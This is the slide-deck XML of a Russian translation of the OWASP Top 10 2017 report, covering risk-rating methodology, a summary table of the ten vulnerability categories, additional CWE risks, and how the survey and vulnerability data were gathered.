                        <a:t>16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+Р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разработчикам ………..….…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8" action="ppaction://hlinksldjump"/>
                        </a:rPr>
                        <a:t>17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+Т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тестировщикам ……….……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9" action="ppaction://hlinksldjump"/>
                        </a:rPr>
                        <a:t>18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+О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организациям ………….……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0" action="ppaction://hlinksldjump"/>
                        </a:rPr>
                        <a:t>19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+М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менеджерам приложений ...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1" action="ppaction://hlinksldjump"/>
                        </a:rPr>
                        <a:t>20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+У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Об угрозах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…………………………………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2" action="ppaction://hlinksldjump"/>
                        </a:rPr>
                        <a:t>21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+ФР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О факторах риска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…………………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3" action="ppaction://hlinksldjump"/>
                        </a:rPr>
                        <a:t>22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+МД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Методология и данные …………..…..…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4" action="ppaction://hlinksldjump"/>
                        </a:rPr>
                        <a:t>23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+Б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Благодарности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5" action="ppaction://hlinksldjump"/>
                        </a:rPr>
                        <a:t>24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57904"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="0" y="990601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Внедрите программу обеспечения безопасности приложений сейчас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Безопасность приложений больше не является факультативной. Под давлением регуляторов и растущего количества атак организации должны разрабатывать эффективные процессы и средства обеспечения безопасности своих приложений и API. Многие организации стараются справиться с огромным количеством уязвимостей в невероятном объеме кода уже выпущенных приложений и API.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рекомендует разработать программу обеспечения безопасности, чтобы проанализировать и улучшить безопасность приложений и API. Обеспечение безопасности требует эффективного взаимодействия различных подразделений организации, включая аудиторов, разработчиков, руководителей и администраторов. Безопасность должна быть наглядной и измеряемой, чтобы можно было увидеть и понять состояние безопасности приложения. Сделайте акцент на работах и результатах, которые реально улучшат безопасность и устранят или снизят риски. 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Модель обеспечения безопасности ПО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Руководство по безопасности приложений для руководителей ИБ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от OWASP содержат большинство ключевых активностей из списка.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50" baseline="0" dirty="0">
                        <a:solidFill>
                          <a:schemeClr val="tx2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+О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Что делать организациям</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="12" name="Diagram 1"/>
          <p:cNvGraphicFramePr/>
          <p:nvPr>
            <p:extLst>
              <p:ext uri="{D42A27DB-BD31-4B8C-83A1-F6EECF244321}">
                <p14:modId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1622032216"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="-914400" y="2951820"/>
          <a:ext cx="8686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F9A383-1D7C-437C-BD6E-2E22B4AF47C1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="40132" y="8172400"/>
            <a:ext cx="1215135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50" b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Обеспечение визуального контроля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39748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baseline="0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Управление жизненным циклом приложения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8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Приложения относятся к наиболее сложным системам, которые люди постоянно создают и обслуживают. Администрирование приложений необходимо поручать ИТ-специалистам, которые будут отвечать за весь их жизненный цикл. Мы предлагаем назначать менеджеров приложений, которые будут отвечать за технические аспекты приложения на протяжении его жизненного цикла, начиная со сбора требований и заканчивая выводом систем из эксплуатации, про что так часто забывают. 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</a:pPr>
                      <a:br>
                        <a:rPr lang="ru-RU" sz="900" b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endParaRPr lang="ru-RU" sz="900" b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+М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делать менеджерам приложений</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="12" name="Diagram 6"/>
          <p:cNvGraphicFramePr/>
          <p:nvPr>
            <p:extLst>
              <p:ext uri="{D42A27DB-BD31-4B8C-83A1-F6EECF244321}">
                <p14:modId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2000980696"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="0" y="2141730"/>
          <a:ext cx="6858000" cy="6930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15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23052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5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</a:rPr>
                        <a:t>Степень опасности уязвимостей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7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Методика оценки степени опасности уязвимостей для списка Топ-10 основана на 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Методике оценки рисков OWASP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Для каждой категории угроз оценивались характерные для стандартного веб-приложения недостатки, исходя из факторов их вероятности и риска. Затем угрозы группировались по степени опасности для веб-приложений. Список уязвимостей обновляется с каждым новым выпуском Топ-10, по мере изменения среды и условий эксплуатации.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Методика оценки рисков OWASP</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ru-RU" sz="95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описывает множество факторов, помогающих оценить опасность обнаруженной уязвимости. Топ-10 предоставляет лишь обобщенные данные, а не информацию о конкретных уязвимостях в реальных приложениях и API. Поэтому никто кроме владельца или менеджера приложения не сможет точно оценить риски, угрожающие конкретному приложению. Только вы обладаете наиболее полными знаниями, чтобы судить о значимости ваших приложений и данных, наличии возможных угроз, а также принципах работы и использования вашей системы.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Наша методика определяет три фактора вероятности наличия уязвимости (распространенность, сложность обнаружения и сложность эксплуатации) и один фактор ее опасности (технические последствия). Уровень значимости каждого фактора классифицируется от 1 (низкий) до 3 (высокий) и определяется специальными терминами. Распространенность, как правило, не требует расчета. Статистические данные по распространенности, предоставленные организациями (см. Благодарности на стр. 24), были обработаны и интегрированы в список Топ-10. Затем эти данные были объединены с двумя другими факторами вероятности (сложность обнаружения и сложность эксплуатации) для расчета вероятности наличия каждой уязвимости. Полученное значение было умножено на среднее значение тяжести технических последствий для определения совокупной опасности каждого пункта списка Топ-10 (чем выше результат, тем выше опасность). Сложность обнаружения и эксплуатации, а также последствия рассчитывались на основе CVE, связанных с каждой категорией Топ-10.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Примечание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: данный подход не учитывает источники угроз, а также технические особенности отдельных приложений. Любой из этих факторов может в значительной степени повлиять на общую вероятность обнаружения и эксплуатации злоумышленником уязвимости. Классификация также не учитывает реальные последствия для бизнеса. </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ru-RU" sz="950" u="sng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Каждая организация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должна сама решить, насколько небезопасными могут быть ее приложения и API с учетом сложившихся традиций, отрасли применения и нормативной базы. В задачи Топ-10 OWASP не входит анализ угроз для конкретной организации.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Ниже представлен расчет степени опасности </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ru-RU" sz="950" b="1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A6:2017-Некорректной настройки параметров безопасности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84784"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="121920" y="5775521"/>
          <a:ext cx="6629400" cy="282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815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8"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приложения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эксплуатации</a:t>
                      </a:r>
                    </a:p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ПРОСТО: </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ru-RU" sz="11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Распространенность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0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ОЧЕНЬ РАСПРОСТР: </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ru-RU" sz="11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Сложность обнаружения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ПРОСТО: </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ru-RU" sz="11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</a:t>
                      </a:r>
                    </a:p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УМЕРЕННЫЕ: </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ru-RU" sz="11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0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бизнеса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805">
                <a:tc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400" b="1" baseline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ru-RU" sz="18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</a:br>
                      <a:r>
                        <a:rPr lang="ru-RU" sz="14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В среднем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0" baseline="0" dirty="0">
                        <a:solidFill>
                          <a:srgbClr val="00B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= </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ru-RU" sz="24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3.0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*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rgbClr val="00000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834045" y="8088825"/>
            <a:ext cx="1039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Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>= </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>6.0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+У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Об угрозах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70906" y="5910536"/>
            <a:ext cx="6238413" cy="390006"/>
            <a:chOff x="-88119" y="1058047"/>
            <a:chExt cx="6238413" cy="390006"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="31" name="Group 40"/>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="-88119" y="1058047"/>
              <a:ext cx="6238413" cy="386519"/>
              <a:chOff x="-88119" y="1070390"/>
              <a:chExt cx="6238413" cy="386519"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="35" name="AutoShape 85"/>
              <p:cNvSpPr>
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="5257799" y="1070390"/>
                <a:ext cx="892495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Последствия</a:t>
                </a:r>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:grpSp>
            <p:nvGrpSpPr>
              <p:cNvPr id="36" name="Group 63"/>
              <p:cNvGrpSpPr>
                <a:grpSpLocks/>
              </p:cNvGrpSpPr>
              <p:nvPr/>
            </p:nvGrpSpPr>
            <p:grpSpPr bwMode="auto">
              <a:xfrm>
                <a:off x="493228" y="1105372"/>
                <a:ext cx="139699" cy="305288"/>
                <a:chOff x="131" y="1565"/>
                <a:chExt cx="288" cy="625"/>
              </a:xfrm>
            </p:grpSpPr>
            <p:sp>
              <p:nvSpPr>
                <p:cNvPr id="42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3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5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6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37" name="Rectangle 89"/>
              <p:cNvSpPr>
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="-88119" y="1073624"/>
                <a:ext cx="692817" cy="2975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77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Источники</a:t>
                </a:r>
                <a:br>
                  <a:rPr lang="ru-RU" sz="8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ru-RU" sz="8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угроз</a:t>
                </a:r>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="38" name="AutoShape 163"/>
              <p:cNvSpPr>
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="1189590" y="1078960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  <a:endParaRPr lang="en-US" sz="90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 algn="ctr"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Векторы</a:t>
                </a:r>
                <a:b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атак</a:t>
                </a:r>
              </a:p>
              <a:p>
                <a:pPr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</a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="39" name="Rectangle 116"/>
              <p:cNvSpPr>
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="2879477" y="1073877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</a:t>
                </a:r>
                <a:r>
                  <a:rPr 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Недостатки</a:t>
                </a:r>
                <a:b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</a:t>
                </a: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безопасности</a:t>
                </a:r>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:cxnSp>
            <p:nvCxnSpPr>
              <p:cNvPr id="40" name="AutoShape 140"/>
              <p:cNvCxnSpPr>
                <a:cxnSpLocks noChangeShapeType="1"/>
                <a:stCxn id="38" idx="3"/>
              </p:cNvCxnSpPr>
              <p:nvPr/>
            </p:nvCxnSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="2027790" y="1257554"/>
                <a:ext cx="838200" cy="4864"/>
              </a:xfrm>
              <a:prstGeom prst="bentConnector2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41" name="AutoShape 108"/>
              <p:cNvCxnSpPr>
                <a:cxnSpLocks noChangeShapeType="1"/>
                <a:endCxn id="38" idx="1"/>
              </p:cNvCxnSpPr>
              <p:nvPr/>
            </p:nvCxnSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="732390" y="1256471"/>
                <a:ext cx="457200" cy="1083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32" name="AutoShape 117"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="2879480" y="1067053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 dirty="0">
                <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="33" name="Rectangle 16"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2861647" y="1211643"/>
              <a:ext cx="110153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xo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:cxnSp>
          <p:nvCxnSpPr>
            <p:cNvPr id="34" name="AutoShape 140"/>
            <p:cNvCxnSpPr>
              <a:cxnSpLocks noChangeShapeType="1"/>
              <a:stCxn id="39" idx="3"/>
              <a:endCxn id="35" idx="2"/>
            </p:cNvCxnSpPr>
            <p:nvPr userDrawn="1"/>
          </p:nvCxnSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm flipV="1">
              <a:off x="3899845" y="1251307"/>
              <a:ext cx="1357954" cy="727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  <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="Right Brace 1"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="5400000">
            <a:off x="2738468" y="6443548"/>
            <a:ext cx="292533" cy="2241840"/>
          </a:xfrm>
          <a:prstGeom prst="rightBrace">
            <a:avLst>
              <a:gd name="adj1" fmla="val 89876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8" name="Right Brace 27"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="5400000">
            <a:off x="4306597" y="7290758"/>
            <a:ext cx="270030" cy="1485165"/>
          </a:xfrm>
          <a:prstGeom prst="rightBrace">
            <a:avLst>
              <a:gd name="adj1" fmla="val 89876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iberation Sans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66362"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="0" y="990600"/>
          <a:ext cx="6858000" cy="128683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Сводная таблица угроз Топ-10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Таблица ниже содержит сводную информацию о Топ-10 угроз безопасности приложений 2017 г., а также факторы риска, назначенные для каждой из угроз. Эти факторы определялись на основе доступной статистики и опыта команды Топ-10 OWASP. Чтобы рассчитать риски для конкретного приложения или организации, </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ru-RU" sz="900" u="sng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необходимо определить специфичные для них источники угроз и последствия для бизнеса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Даже значительные недостатки ПО могут не представлять серьезной опасности, если отсутствуют источники угроз или последствия для бизнеса являются незначительными для рассматриваемых активов.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21096"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="0" y="2231740"/>
          <a:ext cx="6842248" cy="4112255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21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91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УГРОЗЫ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7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Уров</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ru-RU" sz="77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ru-RU" sz="77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опасн</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ru-RU" sz="77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A1:2017-Внедрение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8.0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9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A2:2017-Аутентификация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A3:2017-</a:t>
                      </a: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Разглашение данных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A4:2017-Внеш. сущ-ти XML (XXE)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A5:2017-Недостатки контроля доступа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РАСПРОСТР: </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ru-RU" sz="8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chemeClr val="dk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0579"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="377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A6:2017-Некорр. настр. безопасности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82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A7:2017-Межсайтовое выполнение сценариев (XSS)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A8:2017-Небезопасная десериализация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СЛОЖНО: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5.0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A9:2017-Уязвимые компоненты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4.7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82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A10:2017-Недостатки</a:t>
                      </a:r>
                      <a:br>
                        <a:rPr lang="ru-RU" sz="800">
                          <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
                        </a:rPr>
                      </a:b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журналирования и мониторинга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СЛОЖНО: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4.0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22734"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="0" y="6553201"/>
          <a:ext cx="6858000" cy="25936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Дополнительные риски, требующие внимания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Помимо угроз, представленных в Топ-10, существуют другие риски, которые необходимо оценивать и учитывать. Некоторые из них уже описывались в прошлых версиях Топ-10, а некоторые — нет, включая новые техники атак, которые появляются постоянно. Ниже перечислены дополнительные угрозы безопасности приложений (по номеру CWE), на которые также необходимо обратить внимание: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CWE-352: Межсайтовая подмена запросов (CSRF)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CWE-400: Неконтролируемое использование ресурсов ("Чрезмерное потребление ресурсов", "Отказ в обслуживании приложения")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/>
                        </a:rPr>
                        <a:t>CWE-434: Отсутствие ограничений на загрузку файлов небезопасного типа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CWE-451: Некорректное представление важной информации интерфейсом пользователя (Подмена интерфейса/курсора и прочее)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CWE-601: Перенаправление на небезопасный сайт ("Открытая переадресация")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CWE-799: Некорректное ограничение частоты взаимодействия (Противодействие автоматизации)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CWE-829: Использование функций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недоверенных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 источников (Сторонний контент)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CWE-918: Подмена запросов на стороне сервера (SSRF)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614037" y="2538522"/>
            <a:ext cx="1335723" cy="210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Распространенность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97232" y="2487484"/>
            <a:ext cx="1040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Сложность</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="ru-RU" sz="800" b="1" dirty="0"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8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обнаружения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63815" y="2456765"/>
            <a:ext cx="895106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Сложность</a:t>
            </a:r>
            <a:b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эксплуатации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9351" y="2540968"/>
            <a:ext cx="9162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Технические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78750" y="2276746"/>
            <a:ext cx="4891542" cy="435747"/>
            <a:chOff x="384561" y="1049627"/>
            <a:chExt cx="5307569" cy="687591"/>
          </a:xfrm>
        </p:grpSpPr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2635167" y="1055019"/>
              <a:ext cx="1073105" cy="381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216000" rIns="36000" anchor="ctr"/>
            <a:lstStyle/>
            <a:p>
              <a:pPr algn="ctr" eaLnBrk="0" hangingPunct="0"/>
              <a:r>
                <a:rPr lang="ru-RU" sz="8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Недостатки</a:t>
              </a:r>
              <a:br>
                <a:rPr lang="ru-RU" sz="8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</a:br>
              <a:r>
                <a:rPr lang="ru-RU" sz="8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безопасности</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="40" name="Group 63"/>
            <p:cNvGrpSpPr>
              <a:grpSpLocks/>
            </p:cNvGrpSpPr>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr bwMode="auto">
            <a:xfrm>
              <a:off x="586848" y="1072154"/>
              <a:ext cx="139703" cy="304798"/>
              <a:chOff x="324" y="1497"/>
              <a:chExt cx="288" cy="624"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="49" name="Oval 64"/>
              <p:cNvSpPr>
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="372" y="1497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0" name="Line 65"/>
              <p:cNvSpPr>
                <a:spLocks noChangeShapeType="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="468" y="1689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1" name="Line 66"/>
              <p:cNvSpPr>
                <a:spLocks noChangeShapeType="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm flipH="1">
                <a:off x="324" y="1929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2" name="Line 67"/>
              <p:cNvSpPr>
                <a:spLocks noChangeShapeType="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="468" y="1929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3" name="Line 68"/>
              <p:cNvSpPr>
                <a:spLocks noChangeShapeType="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="324" y="17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41" name="AutoShape 163"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="1309048" y="1078960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endParaRPr lang="ru-RU" sz="900" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent4">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
              </a:endParaRPr>
            </a:p>
            <a:p>
              <a:pPr algn="ctr" eaLnBrk="0" hangingPunct="0"/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Векторы</a:t>
              </a:r>
              <a:b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</a:br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атак</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr algn="ctr" eaLnBrk="0" hangingPunct="0"/>
              <a:endParaRPr lang="ru-RU" sz="900" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent4">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="42" name="AutoShape 85"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="4660790" y="1049627"/>
              <a:ext cx="1031340" cy="428656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000" rIns="18000" anchor="ctr"/>
            <a:lstStyle/>
            <a:p>
              <a:pPr algn="ctr" eaLnBrk="0" hangingPunct="0">
                <a:defRPr/>
              </a:pPr>
              <a:r>
                <a:rPr lang="ru-RU" sz="90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cxnSp>
          <p:nvCxnSpPr>
            <p:cNvPr id="43" name="AutoShape 108"/>
            <p:cNvCxnSpPr>
              <a:cxnSpLocks noChangeShapeType="1"/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm flipV="1">
              <a:off x="829115" y="1262418"/>
              <a:ext cx="441766" cy="123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45" name="AutoShape 140"/>
            <p:cNvCxnSpPr>
              <a:cxnSpLocks noChangeShapeType="1"/>
              <a:stCxn id="39" idx="3"/>
              <a:endCxn id="42" idx="2"/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="3708272" y="1245583"/>
              <a:ext cx="952518" cy="18373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sp>
          <p:nvSpPr>
            <p:cNvPr id="46" name="Rectangle 89"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="384561" y="1404706"/>
              <a:ext cx="690657" cy="332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rIns="36000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Источники</a:t>
              </a:r>
              <a:b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угроз</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:cxnSp>
          <p:nvCxnSpPr>
            <p:cNvPr id="44" name="AutoShape 140"/>
            <p:cNvCxnSpPr>
              <a:cxnSpLocks noChangeShapeType="1"/>
              <a:stCxn id="41" idx="3"/>
              <a:endCxn id="39" idx="1"/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm flipV="1">
              <a:off x="2147248" y="1245583"/>
              <a:ext cx="487919" cy="1197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  <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="37" name="AutoShape 117"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3281899" y="2231740"/>
            <a:ext cx="192106" cy="340902"/>
          </a:xfrm>
          <a:prstGeom prst="rightArrowCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val 47538"/>
              <a:gd name="adj2" fmla="val 51293"/>
              <a:gd name="adj3" fmla="val 57006"/>
              <a:gd name="adj4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endParaRPr lang="en-US" sz="900" b="1" dirty="0">
              <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="83" name="Rectangle 32"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5815563" y="2442479"/>
            <a:ext cx="718782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Для бизнеса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+ФР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О факторах риска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3B246788-8483-43FD-BCB2-20B1833E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51036"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="0" y="987552"/>
          <a:ext cx="6858000" cy="820174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8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Обзор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28">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p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На саммите OWASP активные участники и члены сообщества приняли решение о представлении уязвимостей, двух перспективных классах уязвимостей, а также классификации уязвимостей на основе количественных и качественных данных.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Отраслевые исследования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670">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p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Для исследования были отобраны категории уязвимостей, которые ранее считались кандидатами или упоминались в отзывах на 2017 RC1 в списке рассылки Топ-10. Мы упорядочили эти данные и попросили сообщество выделить топ-четыре уязвимостей, которые стоит включить в Топ-10 OWASP — 2017. Опрос проводился со 2 августа по 18 сентября 2017 г. Было получено 516 ответов, на основе которых были определены категории уязвимостей.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Разглашение частной информации, без сомнения, является самой серьезной уязвимостью, но лишь дополняет существующую категорию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 action="ppaction://hlinksldjump"/>
                        </a:rPr>
                        <a:t>A3:2017-Разглашение конфиденциальных данных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Сюда же можно отнести уязвимости, связанные с шифрованием. Небезопасная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десериализация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была третьей по данным опроса, поэтому после оценки ее опасности она была добавлена в Топ-10 в качестве категории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A8:2017-Небезопасная </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ru-RU" sz="900" b="1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десериализация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Под четвертым номером шли уязвимости, связанные с ключами пользователей, и их включили в список в категорию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A5:2017-Недостатки контроля доступа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Приятно видеть, что в ходе исследования высоко оценили важность этих уязвимостей, поскольку данных по ним немного. Пятыми в списке шли недостатки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мониторинга, которые дополнили Топ-10 категорией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A10:2017-Недостатки </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ru-RU" sz="900" b="1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журналирования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 и мониторинга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Настало время, когда приложение должно уметь определять атаки, регистрировать связанные с ними события, а также выводить предупреждения и реагировать на них. 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Открытый сбор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3525"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="3291073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Традиционно данные собирались и анализировались на основе частотности: сколько уязвимостей было обнаружено в приложениях. Известно, что автоматизированные средства сообщают обо всех фактах обнаружения одной и той же уязвимости, а специалисты — об обнаружении одной уязвимости, но в разных условиях. Поэтому при анализе сложно объединить два этих подхода.</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:endParaRPr lang="en-US" sz="9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Для Топ-10 </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US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—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2017 коэффициент уязвимости рассчитывался на основе количества приложений, имеющих одну или более уязвимостей определенного типа. Большинство данных предоставлялось в двух вариантах: в традиционном частотном, с подсчетом всех фактов обнаружения уязвимости, и нетрадиционном, с подсчетом приложений, в которых уязвимость была обнаружена (один или более раз). Несмотря на несовершенство, этот подход позволяет сравнить данные, полученные специалистами с помощью специализированных средств, и данные, полученные специализированными средствами с участием специалистов. Необработанные данные и результаты анализа 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доступны на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GitHub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Для будущих версий Топ-10 планируется создание дополнительной структуры, предназначенной для этих целей.</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:endParaRPr lang="en-US" sz="9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 ответ на призыв о сборе информации было получено более 40 комплектов данных. Большинство из них идентично полученным в ходе первоначального сбора (на основе частотного подхода), поэтому мы использовали данные только 23 источников, охватывающие ≈114 тыс. приложений. По возможности брались данные за один год от одного источника. Большинство приложений являются уникальными, хотя есть вероятность повторения приложений в ежегодных данных от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Veracode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Данные из 23 комплектов были поделены на полученные специалистами с помощью специальных средств и коэффициенты уязвимости, полученные с помощью инструментов с участием специалистов. Мы рассчитали процентное соотношение приложений, содержащих каждый тип уязвимости. Коэффициент уязвимости использовался для расчета распространенности при оценке опасности для определения статуса уязвимости в списке Топ-10. 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179698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500"/>
              <a:t>+МД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Методология и данные</a:t>
            </a:r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28955"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="188640" y="2929390"/>
          <a:ext cx="6255695" cy="1237565"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr firstRow="1" firstCol="1" bandRow="1"/>
              <a:tblGrid>
                <a:gridCol w="8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Категория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Виды уязвимостей по данным исследования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Оценка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Разглашение конфиденциальных данных (Нарушение конфиденциальности) [CWE-359]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748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Уязвимости, связанные с шифрованием [CWE-310/311/312/326/327]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584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Десериализация недоверенных данных [CWE-502]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514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Обход авторизации с использованием ключа пользователя (Небезопасные прямые ссылки на объекты* и Подмена пути) [CWE-639]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493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Недостатки </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ru-RU" sz="90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мониторинга [CWE-223 / CWE-778]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440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2790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sz="3500"/>
              <a:t>+Б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Благодарности</a:t>
            </a:r>
